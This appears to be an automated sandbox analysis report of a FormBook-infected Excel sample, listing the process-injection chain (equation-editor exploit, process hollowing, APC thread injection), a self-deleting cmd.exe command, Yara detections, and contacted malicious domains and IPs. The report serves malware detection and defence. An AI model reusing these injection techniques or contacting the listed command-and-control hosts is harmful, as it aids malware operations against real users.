Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wscript.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wscript.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\wscript.exe Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\wscript.exe base address: 4F0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000002.2389363675.00000000001F5000.00000004.00000020.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000008.00000002.2389520858.00000000006F0000.00000002.00000001.sdmp, wscript.exe, 00000009.00000002.2389489845.0000000000A80000.00000002.00000001.sdmp Binary or memory string: !Progman

Language, Device and Operating System Detection:

Contains functionality to query locales information (e.g. system language)
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 4_2_00E9D0ED
Source: C:\Users\Public\vbc.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 4_2_00E9D4C3
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B8DB
Source: C:\Users\Public\vbc.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_00E9D487
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 4_2_00E9D055
Source: C:\Users\Public\vbc.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 4_2_00E9D420
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 4_2_00E9A026
Source: C:\Users\Public\vbc.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 4_2_00E96000
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 4_2_00E9D161
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 4_2_00E9A165
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 4_2_00E9AD1C
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_00EA0A4C
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B615
Source: C:\Users\Public\vbc.exe Code function: _strlen,EnumSystemLocalesA, 4_2_00E9D3F7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 4_2_00EA1BCF
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW, 4_2_00E99FA3
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 4_2_00E9B3BD
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 4_2_00E99FBC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 4_2_00E9CF3E
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 4_2_00E9D333
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen, 6_2_00E9D0ED
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B8DB
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA, 6_2_00E9D055
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLastError,GetLocaleInfoW,__alloca_probe_16,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,GetLocaleInfoA, 6_2_00E9A026
Source: C:\Users\Public\vbc.exe Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoW, 6_2_00E96000
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage, 6_2_00E9D161
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat, 6_2_00E9A165
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 6_2_00EA0A4C
Source: C:\Users\Public\vbc.exe Code function: _strlen,EnumSystemLocalesA, 6_2_00E9D3F7
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA, 6_2_00EA1BCF
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B3BD
Source: C:\Users\Public\vbc.exe Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage, 6_2_00E9D333
Source: C:\Users\Public\vbc.exe Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itoa_s, 6_2_00E9D4C3
Source: C:\Users\Public\vbc.exe Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_00E9D487
Source: C:\Users\Public\vbc.exe Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA, 6_2_00E9D420
Source: C:\Users\Public\vbc.exe Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo, 6_2_00E9AD1C
Source: C:\Users\Public\vbc.exe Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,InterlockedDecrement,InterlockedDecrement, 6_2_00E9B615
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoW, 6_2_00E99FA3
Source: C:\Users\Public\vbc.exe Code function: _LocaleUpdate::_LocaleUpdate,GetLocaleInfoW, 6_2_00E99FBC
Source: C:\Users\Public\vbc.exe Code function: GetLocaleInfoA,GetLocaleInfoA,GetACP, 6_2_00E9CF3E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00E9515C GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 4_2_00E9515C
Source: C:\Users\Public\vbc.exe Code function: 4_2_00EA0DE3 __lock,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,__getenv_helper_nolock,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson, 4_2_00EA0DE3

Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook
Source: Yara match File source: 00000009.00000002.2389315305.00000000001D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389221261.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2389348504.0000000000240000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215222613.0000000000170000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2179579442.0000000000EA8000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215291644.00000000002B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.2215328255.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 6.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vbc.exe.e90000.0.unpack, type: UNPACKEDPE
Behavior Graph

Behavior Graph ID: 323042
Sample: PI202009255687.xlsx
Startdate: 26/11/2020
Architecture: WINDOWS
Score: 100

Sample-level signatures:
  Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  Multi AV Scanner detection for domain / URL
  Malicious sample detected (through community Yara rule)
  14 other signatures

Process tree (parent -> child):

EXCEL.EXE (started)
  Dropped: C:\Users\user\Desktop\~$PI202009255687.xlsx, data

EQNEDT32.EXE (started)
  Network: wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu 103.141.138.87, 49167, 80 VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN Viet Nam
  Dropped: C:\Users\user\AppData\Local\...\winlog[1].exe, PE32
  Dropped: C:\Users\Public\vbc.exe, PE32
  Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  -> vbc.exe (started)
       Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
       -> vbc.exe (started)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            -> explorer.exe (injected)
                 Network: lygosfilms.info 34.102.136.180, 49168, 80 GOOGLEUS United States
                 Network: paletciniz.com 160.153.138.53, 49169, 80 GODADDY-AMSDE United States
                 Network: 3 other IPs or domains
                 Signature: System process connects to network (likely due to code injection or exploit)
                 -> wscript.exe (started)
                      Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
                      -> cmd.exe (started)

Contacted Public IPs

IP               Domain    Country        ASN     ASN Name                                            Malicious
160.153.138.53   unknown   United States  21501   GODADDY-AMSDE                                       true
104.164.99.242   unknown   United States  18779   EGIHOSTINGUS                                        true
103.141.138.87   unknown   Viet Nam       135905  VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN  true
34.102.136.180   unknown   United States  15169   GOOGLEUS                                            true

Contacted Domains

Name                                              IP               Active
wsdyneverwalkachinese2loneinlifekwsfnv.ydns.eu    103.141.138.87   true
paletciniz.com                                    160.153.138.53   true
lygosfilms.info                                   34.102.136.180   true
www.annaothomas.com                               104.164.99.242   true
www.paletciniz.com                                unknown          unknown
www.lygosfilms.info                               unknown          unknown